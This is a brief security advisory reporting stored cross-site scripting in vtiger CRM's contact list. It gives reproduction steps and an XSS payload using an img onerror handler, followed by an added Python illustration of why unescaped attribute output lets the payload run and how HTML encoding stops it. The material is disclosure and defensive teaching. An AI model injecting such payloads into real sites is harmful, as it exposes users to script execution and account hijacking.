# Affected software: vtiger.com
# Discovered by: Provensec
# Website: http://www.provensec.com
# Type of vulnerability: XSS Stored
# Description: Paydirt is currently integrated with Chrome and Firefox

1. Go to site.vtiger.com/index.php?module=Contacts&view=List
2. Add a new contact and fill the fields with the XSS payload "><img src=x onerror=confirm(1);>
3. Then click on the added contact in the list and click see full details
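
Added example, not part of the original advisory and not vtiger code: a Python model of why the payload from step 2 runs when a stored field is written into an HTML attribute without encoding, and how encoding at output time keeps it inert. The `lastname` input and both render functions are hypothetical; the attribute context is an assumption based on the payload's leading `">`.

```python
import html
from html.parser import HTMLParser

# Payload from step 2 of the advisory, stored verbatim as a contact field value.
STORED_VALUE = '"><img src=x onerror=confirm(1);>'


def render_unsafe(value):
    # Hypothetical detail view: stored value concatenated into an attribute.
    return '<input type="text" name="lastname" value="' + value + '">'


def render_escaped(value):
    # Same view, with the value HTML-encoded (quotes included) at output time.
    return ('<input type="text" name="lastname" value="'
            + html.escape(value, quote=True) + '">')


class _Audit(HTMLParser):
    """Records each start tag, any on* handler attributes, and input values."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []
        self.handlers = []
        self.values = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        for name, val in attrs:
            if name.startswith("on"):
                self.handlers.append((tag, name))
            if tag == "input" and name == "value":
                self.values.append(val)


def audit(markup):
    """Parse rendered markup and report the elements a browser would build."""
    parser = _Audit()
    parser.feed(markup)
    parser.close()
    return {"tags": parser.tags, "handlers": parser.handlers,
            "values": parser.values}


if __name__ == "__main__":
    print("unsafe :", audit(render_unsafe(STORED_VALUE)))
    print("escaped:", audit(render_escaped(STORED_VALUE)))
```

In the unsafe rendering the parser sees a second element carrying an `onerror` handler; in the escaped rendering the same bytes come back only as the text value of the single `input`.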